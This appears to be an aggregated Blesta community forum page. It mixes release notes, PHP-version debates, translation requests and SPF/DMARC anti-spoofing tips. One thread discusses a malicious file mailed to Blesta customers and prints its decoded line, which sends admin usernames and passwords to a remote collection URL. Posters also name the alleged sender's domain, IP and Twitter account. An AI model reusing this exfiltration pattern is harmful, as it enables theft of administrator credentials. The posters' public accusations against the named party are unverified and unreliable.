Leaderboard

Thanks for decoding! Could someone send me the decrypted file? At the moment I think I'm the only one client who received this e-mail. I think it's a targeted attack on our company. We will pass the information to the German police.

Think this way: 1º- Who uses a sofisticated automated billing system Like Blesta? Re: IT's Managers, Hosting Companies, DataCenters. 2º- Who the hell on point 1º dont want to use a stable, up to date PHP and/or MySQL Version, even if they dont use CloudLinux, Interworx or outher? Re: No one, only none professional buisness or kidies that dont know how to really manage an Hosting buisness want that. There is no reason that you can tell me to convice me to use an outdated PHP and/or MySQL version We do professional buisness, dont you? Everithing is unsecure, I repeat, everithing, even latest PHP 5.6 or MySQL Latest, but if you use the A person that buy Blesta, is a person consern with client data, so it has to use security to prevent future problems Im not telling this to you to get me rong, just to make a point

The Refunded status will be in v3.4

To me it doesn't make sense for my billing software to be writing software for other CMS's. I would rather have them focus on what they are supposed to be doing, billing. The blesta API gives you almost complete access to do whatever you need to do in order to interact with blesta. Now I can make sure everything is secure, as in theory, I will know my CMS of choice better then the blesta team so I can properly secure my plugin and make sure it is 100% compatible with any oddities I may have in my system. I would rather have someone who knows my system well then just putting a bunch of plugins together and hoping for the best. I'm not sure what type of integration plugin you are looking for. It sounds like you want a plugin that adds the login hook for you? What do you consider "popular CMS's" there are a ton out there. I would guess wordpress, drupal, and joomla but really that list can go on.

Yeah, PauloV decoded it. I debated not posting this information but here's where the file sends your admin details: https://my.dorob.de/modules/addons/passwords/insert.php?url=" . $url . "&user=" . $u . "&pw=" . $p Domain is registered to: IP address is 37.228.135.135 which belongs to: This person also has the twitter account https://twitter.com/dorobde and was critical of Blesta in this tweet: https://twitter.com/DoRobDE/status/507934296829861888

Anyone send you the decoded file? The ISP is telling me they are aware of the police investigation. I'm curious how it turns out, and wish you the best of luck.

We sent a notice to the ISP

Looks promising, can't load the site.

Hi, I just get the message back that server and ip were locked.

The thing is this wannabe hacker forgot if someone decoded it he's domain would be there, which then linked to the stupid tweet we know about and then linked to a visible who.is, and a team page which we could google their name...

I am looking into the issue right now.

According to here: http://docs.blesta.com/display/user/Requirements Blesta supports PHP versions as low as 5.1.3. Looking at the end of life (EOL) of PHP's releases (http://php.net/eol.php), which means absolutely no support anymore except for MAYBE security releases, here's how it breaks up: PHP 5.1 EOL: August 24, 2006 PHP 5.2 EOL: January 6, 2011 PHP 5.3 EOL: August 14, 2014 Now there's some points here: Blesta doesn't take advantage of some of the nicer features of PHP 5.3+, namely namespaces (release notes on 5.3: http://php.net/releases/5_3_0.php) The fact that Blesta supports such outdated versions of PHP leaves itself open to some vulnerabilities due to also having to use old/outdated scripts that still support legacy versions as well 5.3's EOL just happened, and has been stated by the PHP team that they are only focused on security updates for it now, and 5.4 is not far behind 5.6 just came out, with talks already of either a 5.7 or finally releasing PHP 7 within the next year or two There's also the problem that now Blesta has to provide ionCube-encoded files for not only pre-5.5 but also 5.5 and potentially newer versions. I.e.: I develop with 5.5, and want to upgrade to 5.6 but can't due to this. From a developer standpoint, using more current versions of PHP provides a lot more opportunities to developers (i.e.: namespaces are amazing for a community-driven project like Blesta gives the vibe of). Granted, compared to WHMCS it already is in a lot of ways, but I feel this is holding Blesta back more than anything. If hosts are using such archaic versions of PHP to begin with then there's more issues than Blesta can deal with. I simply propose supporting the feature set of 5.3 and higher (at least 5.3), has supporting something that was discontinued 8 years ago to this day does make development for it more difficult than it should.

Version 3.3.0 is now available. You can download it in the Client Area. If you have an owned branded or owned unbranded license purchased more than one year ago, be sure you have Support and Updates for your license before attempting to upgrade. To purchase support and updates: Log into the client area and click the "Manage" link next to your license, then click "Addons", and select Support and Updates from the drop down menu, and continue to purchase. Installing Blesta See Installing Blesta in the User Manual for instructions. Upgrading Blesta See Upgrading Blesta in the User Manual for instructions. Migrating to Blesta See Migrating to Blesta in the User Manual for instructions. Overview Pro forma invoices Pro rata Price overrides Modules:Added Multicraft Plugins:Update Order plugin to include new order forms templates Tons more... PHP 5.5+ Users Included in this release is a /hotfix-php5.5/ directory. Please use this directory to overwrite the default /blesta/app/app_controller.php, /blesta/app/app_model.php, and /blesta/app/models/license.php files. Release Notes See Blesta Core - Version 3.3.0-b1. See Blesta Core - Version 3.3.0-b2. See Blesta Core - Version 3.3.0. For older releases see all Change Logs.

It's not always feasible to have universal package names, so it would be great if Blesta could let us type the name in all the installed languages, just like for the descriptions

When you install a language you get a tab for the Welcome email (and emails) however no language box for the descriptions... Please come with the 3.4 when the language changer comes *cough*

Everyone *should* keep their software updated and a lot of hosting companies do make the effort. Still, there are many smaller hosting companies that don't. Much of the market consists of smaller hosting providers that have reseller accounts from larger hosting providers. Fortunately, the majority of them are now running PHP 5.3+, hence the pending minimum requirements bump.

That's exactly PHP's problem (and Microsoft's too )

Definitions for v3.3.0 have been added to the Translator.

What's the difference between MySQL and PHP? They both are languages which can be insecure at any time, and you can if you use CloudLinux PHP Selector but hey I dont

1 out of thousands, the thing is not everyone wants to upgrade, I've upgraded MySQL & InnoDB default (Should be stabler) before and had too many issues than I can think of. So I wouldn't use that if it was the last on earth until I was sure and 10000% sure it was fine.

Yeah I am working on it currently, provisioning and admin area management for each service (droplet) is done, and starting from tomorrow will start on the client side droplet management.

Why don't you put the translation editor code to github and let the community help out. This way you can concentrate on the core of Blesta and we can worry about the translation editor.

We don't want to delete data that can have adverse effects on other areas of the system, so we prevent its deletion, and it should be marked inactive instead. We may revisit this in the future to allow packages to be deleted if we can avoid the data loss for attached services in an acceptable manner. As for finding the services, you should be able to use the Smart or Service search in the admin interface to search by the package name in order to receive a list of services, or clients that use that service, respectively.

Currently, when defining a dropdown, it's not possible to display the different elements in the dropdown using translated text, which means that unless, we use brand names, people who don't understand english may not understand some of the custom fields they're presented with.

Stats on existing users don't necessarily correlate to potential customers, which is obviously the biggest concern when operating a business. To take an extreme look at it, we could make PHP 5.6 the minimum, and yes some people would be fine, others could upgrade, but we would receive almost 0 new business.

Do you have statistics for Blesta users? I assume you collect them via the license revalidation but if not then maybe you should. I suspect there would be a lot less Blesta servers running 5.2 or lower compared to other servers. Also a lot of the users on older PHP versions probably haven't upgraded just because their version was still supported. If you force them to upgrade I don't think many users would have problems.

Regarding dropping support for PHP < 5.3. I have been for this since 3.0.0-a1 back in November 2012. The problem was at that time, more than 60% of all servers were still running 5.2 or lower. Today, sadly, there are still 25% of servers running PHP 5.2 or lower. Why have people been so slow to adopt PHP 5.3? Well, I suspect it has something to do with the fact that RHEL and CentOS are so incredibly slow to adopt new packages, coupled with the fact that most hosts don't keep servers up to date. In an ideal world, everyone would be running the latest version of PHP (5.6 today), but that's just not reality, and for us to shut off support for 5.2 and lower prematurely would hurt a lot of people. We always recommend installing Blesta using separation of concerns (1 server/VPS per role = minimum 3 servers/VPS [1 DB, 1 web, 1 mail]), but reality is there are tons of people that have Blesta installed in a shared environment. As Paul said, we'll be making 5.3 the minimum soon, as we now feel comfortable with the statistical usage of 5.3+.

I may move some beta threads over before I close the forum. I'm in no hurry to close the forum right now as it's the typical post-release rush of tickets and am pretty busy. So... feature requests that have not been implemented, and bug fixes that have not been fixed?

Yeah, he is busted. What an idiot. We have too many experienced webmasters, coders, and admins here for a scrpit kiddie to get away with much. An experienced spammer/hacker would not bother with such nonsense as this. They just want to send their spam. It looks like a deliberate attempt to make the Blesta company look bad. --------------------- here is an SPF generator if anyone needs it http://www.spfwizard.net/ Microsoft makes one too: http://www.microsoft.com/mscorp/safety/content/technologies/senderid/wizard/

The -all will reject everything that does not pass. I like to use ~all because I can still get the flagged email. I simply setup a rule to have those flagged emails go to thje flagged folder. Then I can scan through them for any mistaken failures (or someone who simply does not have the records set correctly) and also remember those that are frequent abusers. The frequent ones can be can be blocked on ACL or IP Tables. I guess whatever works is the answer as long as something is in place to prevent domain spoofing. This will stop many of the script kiddies and wannabe hackers, but a determined spammer will try other methods than spoofing to hijack an email server.

great news ... what about the forums for 3.3 , it will remain or it will be hidden ? please don't make them hidden or move the thread to thier respective forums in the community . some thread has a good informations .

Correct. Nothing can stop someone from using domain.com@gmail.com --except for being observant. I know it does work if someone is trying to spoof the actual domain name. For example, the mail server would bounce an email from sales@blesta.com if: (1)the blesta zone file has an SPF record set and (2)the email is not originating from blesta's email server. Of course, nothing in life is 100% but I can say that using this has cut down on my domain being spoofed and on the amount of spoofed emails that I receive. If I had a complany like Blesta I would probaby use the "soft fail" [ "v=spf1 ~all" ] flag so I could still get the email but also be alerted that it may not be coming from the correct server. The hard fail option is good for invividuals who do not want to get any spoofed mail at all.

Yeah I think however that only works for fake @domain.com not domain.com@gmail.com we have: DMARC which again like SPF works at ensuring the IP is correct of the sender. v=DMARC1; p=quarantine; pct=50; adkim=strict; but it quarantines fakes, but only 50% of it (This is to ensure real emails don't get effected whilst the inboxes are learning).

Glad you didn't fool for it

We found an issue where in some cases you wouldn't be able to upgrade with a trial license. This may or may not have affected some monthly licenses. @flangefrog wasn't affected by this.. what you have going on is something very different, and I suspect may be related to your server. The data sent from your server is missing important information, and I don't know why. I can't duplicate in my testing. My suggestion is to try to roll back to 3.2 for now. You should only have to restore your files, as your database has not been upgraded.

Thank you guys..for this release..

Lol still, I drifted off watching footie in the dark

Just playing with you. I always forget you are from the UK.

Open a ticket, you shouldn't get this with a monthly license at all.

It's been decoded mate.

Good job PauloV

It's like WHM** they and cPanel do a fix and release more information two weeks later so people don't get effected. What the idiot who sent it forgot was Blesta doesn't send emails and they announce what it sort of is and who found it if someone did outside the team.

Update: Here is the response from TeamGantt: "Thanks for writing in and letting us know about Blesta. It looks like a neat app. We currently only completed one integration at this point, but we hope to do more down the road. We’ll put this on our list of integrations to consider. I could see how it would be useful. Thanks again for your feedback." Looks like they're probably not going to do it any time soon, but it's great that now more people know about it!

Settings > Company > Custom Client Fields > Add > Custom Regex

are you sleeping over the keyboard ? so maybe you have touched some keys (DEL) + (CTRL+S) and job done